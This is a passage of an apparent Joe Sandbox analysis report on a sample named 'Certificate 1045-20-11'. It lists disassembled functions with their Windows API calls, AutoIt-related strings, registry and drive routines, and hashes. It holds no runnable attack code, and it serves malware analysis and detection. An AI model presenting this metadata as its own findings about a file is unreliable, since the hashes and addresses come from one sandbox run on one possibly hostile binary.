                                                                                  • Part of subcall function 008AD575: SelectObject.GDI32(?,?), ref: 008AD625
                                                                                  • Part of subcall function 008AD575: InflateRect.USER32(?,000000FF,000000FF), ref: 008AD644
                                                                                  • Part of subcall function 008AD575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008AD65B
                                                                                  • Part of subcall function 008AD575: GetWindowLongW.USER32(00000000,000000F0), ref: 008AD670
                                                                                  • Part of subcall function 008AD575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008AD698
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                • String ID:
                                                                                • API String ID: 3521893082-0
                                                                                • Opcode ID: 762988f8cd7a5249dfafe127057913954b2a73537677d884c9730099c5056748
                                                                                • Instruction ID: 73c624ebe3ccbe70823cce8b489822eb43551f5c39632b0a7c035c78dbaca3d1
                                                                                • Opcode Fuzzy Hash: 762988f8cd7a5249dfafe127057913954b2a73537677d884c9730099c5056748
                                                                                • Instruction Fuzzy Hash: 4D917C72408305FFDB10AF64DC08E6BBBB9FB89325F101A29F962D65A0D771E944CB52
                                                                                Function 0085B8FD Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 491windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • DestroyWindow.USER32 ref: 0085B98B
                                                                                • DeleteObject.GDI32(00000000), ref: 0085B9CD
                                                                                • DeleteObject.GDI32(00000000), ref: 0085B9D8
                                                                                • DestroyIcon.USER32(00000000), ref: 0085B9E3
                                                                                • DestroyWindow.USER32(00000000), ref: 0085B9EE
                                                                                • SendMessageW.USER32(?,00001308,?,00000000), ref: 008BD2AA
                                                                                • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 008BD2E3
                                                                                • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 008BD711
                                                                                  • Part of subcall function 0085B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0085B759,?,00000000,?,?,?,?,0085B72B,00000000,?), ref: 0085BA58
                                                                                • SendMessageW.USER32 ref: 008BD758
                                                                                • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 008BD76F
                                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 008BD785
                                                                                • ImageList_Destroy.COMCTL32(00000000), ref: 008BD790
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                • String ID: 0
                                                                                • API String ID: 464785882-4108050209
                                                                                • Opcode ID: f4081b43df466315cdace13d2bf5b35b087fde687d6d67ccc0bf554e5b845863
                                                                                • Instruction ID: e90cbda89065caee81ee7fa46fe5d06dd6c6ad35cd3b13666c997b4e31a0eefa
                                                                                • Opcode Fuzzy Hash: f4081b43df466315cdace13d2bf5b35b087fde687d6d67ccc0bf554e5b845863
                                                                                • Instruction Fuzzy Hash: 97128A70204701AFDB21DF28C884BA9BBF5FF19305F144569F989CB662EB31E845CB92
                                                                                Function 0088DBC4 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 187COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 0088DBD6
                                                                                • GetDriveTypeW.KERNEL32(?,008DDC54,?,\\.\,008DDC00), ref: 0088DCC3
                                                                                • SetErrorMode.KERNEL32(00000000,008DDC54,?,\\.\,008DDC00), ref: 0088DE29
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$DriveType
                                                                                • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                • API String ID: 2907320926-4222207086
                                                                                • Opcode ID: fb2a659a87608f4f2f14272d15b796b39912cc64e2f50b71fad8b01610a20830
                                                                                • Instruction ID: 84c08165cfa374512e89656260692bf61b3374dc688e3f112cc1fbc56949fb92
                                                                                • Opcode Fuzzy Hash: fb2a659a87608f4f2f14272d15b796b39912cc64e2f50b71fad8b01610a20830
                                                                                • Instruction Fuzzy Hash: 8D51B03024830AABC610FF25C892839B7A1FFA4719F20591AF567DB3E1DB74DA45DB42
                                                                                Function 0084CC24 Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 267COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: __wcsnicmp
                                                                                • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                • API String ID: 1038674560-86951937
                                                                                • Opcode ID: bff9339b49b8dae7d421430c1f32307bb615f86374f6e0cd17c8ba802166dbc7
                                                                                • Instruction ID: 401166506851c1fedf207aebe5cb5003b90366f6c9a04e7e1ab311e2bd44f5cf
                                                                                • Opcode Fuzzy Hash: bff9339b49b8dae7d421430c1f32307bb615f86374f6e0cd17c8ba802166dbc7
                                                                                • Instruction Fuzzy Hash: 8881E53064130DABCB61AA68CC82FBA776DFF24304F044039F905EB387EB61D945C696
                                                                                Function 008A638D Relevance: 42.4, APIs: 1, Strings: 23, Instructions: 352COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?,008DDC00), ref: 008A6449
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharUpper
                                                                                • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                • API String ID: 3964851224-45149045
                                                                                • Opcode ID: f394dfa41449bd7847533303dfab1390f2fb0cf630848f07f28d31fead4ddcd3
                                                                                • Instruction ID: 7d9e07ca281953bce8013e48964db9ac8e61a160bfca502ef2546815981a2e8d
                                                                                • Opcode Fuzzy Hash: f394dfa41449bd7847533303dfab1390f2fb0cf630848f07f28d31fead4ddcd3
                                                                                • Instruction Fuzzy Hash: 59C1C4302142198BDB04EF18C451A6E77A5FF96344F084869F986DB7A6EB30ED1ECB43
                                                                                Function 008AD575 Relevance: 39.2, APIs: 26, Instructions: 186windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSysColor.USER32(00000012), ref: 008AD5AE
                                                                                • SetTextColor.GDI32(?,?), ref: 008AD5B2
                                                                                • GetSysColorBrush.USER32(0000000F), ref: 008AD5C8
                                                                                • GetSysColor.USER32(0000000F), ref: 008AD5D3
                                                                                • CreateSolidBrush.GDI32(?), ref: 008AD5D8
                                                                                • GetSysColor.USER32(00000011), ref: 008AD5F0
                                                                                • CreatePen.GDI32(00000000,00000001,00743C00), ref: 008AD5FE
                                                                                • SelectObject.GDI32(?,00000000), ref: 008AD60F
                                                                                • SetBkColor.GDI32(?,00000000), ref: 008AD618
                                                                                • SelectObject.GDI32(?,?), ref: 008AD625
                                                                                • InflateRect.USER32(?,000000FF,000000FF), ref: 008AD644
                                                                                • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 008AD65B
                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 008AD670
                                                                                • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 008AD698
                                                                                • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 008AD6BF
                                                                                • InflateRect.USER32(?,000000FD,000000FD), ref: 008AD6DD
                                                                                • DrawFocusRect.USER32(?,?), ref: 008AD6E8
                                                                                • GetSysColor.USER32(00000011), ref: 008AD6F6
                                                                                • SetTextColor.GDI32(?,00000000), ref: 008AD6FE
                                                                                • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 008AD712
                                                                                • SelectObject.GDI32(?,008AD2A5), ref: 008AD729
                                                                                • DeleteObject.GDI32(?), ref: 008AD734
                                                                                • SelectObject.GDI32(?,?), ref: 008AD73A
                                                                                • DeleteObject.GDI32(?), ref: 008AD73F
                                                                                • SetTextColor.GDI32(?,?), ref: 008AD745
                                                                                • SetBkColor.GDI32(?,?), ref: 008AD74F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                • String ID:
                                                                                • API String ID: 1996641542-0
                                                                                • Opcode ID: c5ee6464d04c03eeb9b1d91df326a8982f388411d66ed4e2c731fd4e858f4801
                                                                                • Instruction ID: 68265797027bceab2f7ca9d5ba5543d362efc0f117696283f6d98c067f703eaf
                                                                                • Opcode Fuzzy Hash: c5ee6464d04c03eeb9b1d91df326a8982f388411d66ed4e2c731fd4e858f4801
                                                                                • Instruction Fuzzy Hash: CD513F72900208EFDF10AFA4DC48EAEBB79FB09324F144525F915EB2A1D7719940CF50
                                                                                Function 008AB6C4 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 400windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 008AB7B0
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008AB7C1
                                                                                • CharNextW.USER32(0000014E), ref: 008AB7F0
                                                                                • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 008AB831
                                                                                • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 008AB847
                                                                                • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 008AB858
                                                                                • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 008AB875
                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 008AB8C7
                                                                                • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 008AB8DD
                                                                                • SendMessageW.USER32(?,00001002,00000000,?), ref: 008AB90E
                                                                                • _memset.LIBCMT ref: 008AB933
                                                                                • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 008AB97C
                                                                                • _memset.LIBCMT ref: 008AB9DB
                                                                                • SendMessageW.USER32 ref: 008ABA05
                                                                                • SendMessageW.USER32(?,00001074,?,00000001), ref: 008ABA5D
                                                                                • SendMessageW.USER32(?,0000133D,?,?), ref: 008ABB0A
                                                                                • InvalidateRect.USER32(?,00000000,00000001), ref: 008ABB2C
                                                                                • GetMenuItemInfoW.USER32(?), ref: 008ABB76
                                                                                • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 008ABBA3
                                                                                • DrawMenuBar.USER32(?), ref: 008ABBB2
                                                                                • SetWindowTextW.USER32(?,0000014E), ref: 008ABBDA
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                • String ID: 0
                                                                                • API String ID: 1073566785-4108050209
                                                                                • Opcode ID: 0ad59e19786a6181427c40a41900e8dc1d8033e7f33962bc58c0f0f52e2c3541
                                                                                • Instruction ID: 9dbe93dc8069d4a90f0a048fa0703220f41a79f8788279fb2b6b7628d960c09c
                                                                                • Opcode Fuzzy Hash: 0ad59e19786a6181427c40a41900e8dc1d8033e7f33962bc58c0f0f52e2c3541
                                                                                • Instruction Fuzzy Hash: 86E1AE70900208AFEB209F65CC84EEE7B78FF06714F108166F959EA592DBB48A41DF61
                                                                                Function 008A764F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCursorPos.USER32(?), ref: 008A778A
                                                                                • GetDesktopWindow.USER32 ref: 008A779F
                                                                                • GetWindowRect.USER32(00000000), ref: 008A77A6
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 008A7808
                                                                                • DestroyWindow.USER32(?), ref: 008A7834
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 008A785D
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 008A787B
                                                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 008A78A1
                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 008A78B6
                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 008A78C9
                                                                                • IsWindowVisible.USER32(?), ref: 008A78E9
                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 008A7904
                                                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 008A7918
                                                                                • GetWindowRect.USER32(?,?), ref: 008A7930
                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 008A7956
                                                                                • GetMonitorInfoW.USER32 ref: 008A7970
                                                                                • CopyRect.USER32(?,?), ref: 008A7987
                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 008A79F2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                • String ID: ($0$tooltips_class32
                                                                                • API String ID: 698492251-4156429822
                                                                                • Opcode ID: 782c9d775a3bb60f58059b8bb9a5216c0011dc0f44456eb076ef1a558efd4a17
                                                                                • Instruction ID: 9280b119755eb0d740ade846ca3335fb793ecab29a58595bd340adb5c0686d5c
                                                                                • Opcode Fuzzy Hash: 782c9d775a3bb60f58059b8bb9a5216c0011dc0f44456eb076ef1a558efd4a17
                                                                                • Instruction Fuzzy Hash: 11B18071608300AFEB04DF68C948B6ABBE4FF89310F00892DF599DB291D774E804DB96
                                                                                Function 0085A856 Relevance: 35.3, APIs: 18, Strings: 2, Instructions: 285windowtimeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0085A939
                                                                                • GetSystemMetrics.USER32(00000007), ref: 0085A941
                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0085A96C
                                                                                • GetSystemMetrics.USER32(00000008), ref: 0085A974
                                                                                • GetSystemMetrics.USER32(00000004), ref: 0085A999
                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0085A9B6
                                                                                • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0085A9C6
                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0085A9F9
                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0085AA0D
                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 0085AA2B
                                                                                • GetStockObject.GDI32(00000011), ref: 0085AA47
                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 0085AA52
                                                                                  • Part of subcall function 0085B63C: GetCursorPos.USER32(000000FF), ref: 0085B64F
                                                                                  • Part of subcall function 0085B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0085B66C
                                                                                  • Part of subcall function 0085B63C: GetAsyncKeyState.USER32(00000001), ref: 0085B691
                                                                                  • Part of subcall function 0085B63C: GetAsyncKeyState.USER32(00000002), ref: 0085B69F
                                                                                • SetTimer.USER32(00000000,00000000,00000028,0085AB87), ref: 0085AA79
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                • String ID: AutoIt v3 GUI$MZER
                                                                                • API String ID: 1458621304-3817250719
                                                                                • Opcode ID: a60f6e6a4af2a4202e6b64feb2884d42050c59dbfb80e67c45ef462e885e2509
                                                                                • Instruction ID: 415b511f016e175bac7c0d9f3461ff44ed5f2b901580a47a9c9d3c70782caba6
                                                                                • Opcode Fuzzy Hash: a60f6e6a4af2a4202e6b64feb2884d42050c59dbfb80e67c45ef462e885e2509
                                                                                • Instruction Fuzzy Hash: 23B12771A0021AAFDB18DFA8DC85BEE7BB4FB08315F154229FA15E7290DB74E841CB51
                                                                                Function 00842EC0 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 346COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Window$Foreground
                                                                                • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                • API String ID: 62970417-1919597938
                                                                                • Opcode ID: 0ef583820432fd4479662bb096b3668d50beb023ea2886106ce77c427fa519a6
                                                                                • Instruction ID: c5288dc3d7389df1397422125fa1c0d38ca6ebaded27bc6794eb6c535c6a7498
                                                                                • Opcode Fuzzy Hash: 0ef583820432fd4479662bb096b3668d50beb023ea2886106ce77c427fa519a6
                                                                                • Instruction Fuzzy Hash: F8D1C53010874A9BCB14EF68C8819EAFBB0FF54344F504A19F455D73A1DB30E95ACB92
                                                                                Function 008A3639 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 008A3735
                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,008DDC00,00000000,?,00000000,?,?), ref: 008A37A3
                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 008A37EB
                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 008A3874
                                                                                • RegCloseKey.ADVAPI32(?), ref: 008A3B94
                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 008A3BA1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: Close$ConnectCreateRegistryValue
                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                • API String ID: 536824911-966354055
                                                                                • Opcode ID: dfbe37e8c038867913a11a2a54963d7fc7a3a1401c3b93ad1a34144140d17d37
                                                                                • Instruction ID: 5e0adeab153d83b0e81ed6d9571f52e48906bb5bd4a065242a9f06eaff4f773c
                                                                                • Opcode Fuzzy Hash: dfbe37e8c038867913a11a2a54963d7fc7a3a1401c3b93ad1a34144140d17d37
                                                                                • Instruction Fuzzy Hash: FE024A756046059FDB24EF28C851A2AB7E5FF89720F04845DF99ADB3A1CB34ED01CB86
                                                                                Function 008A6BC9 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • CharUpperBuffW.USER32(?,?), ref: 008A6C56
                                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 008A6D16
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1722824436.0000000000841000.00000020.00000001.01000000.00000003.sdmp, Offset: 00840000, based on PE: true
                                                                                • Associated: 00000000.00000002.1722777683.0000000000840000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723014522.00000000008EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723107145.00000000008FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1723131983.0000000000904000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_840000_Certificate 1045-20-11.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharMessageSendUpper
                                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                • API String ID: 3974292440-719923060
                                                                                • Opcode ID: 87c3a63e4a92e1e7ffa4a897084ce6fd9a02d9b530a45c2d3ac2330f85dcaedd
                                                                                • Instruction ID: 1f5391a6ca5216c787bdc9d13f95d210d2600be7617f8372616d8275b04f75fb
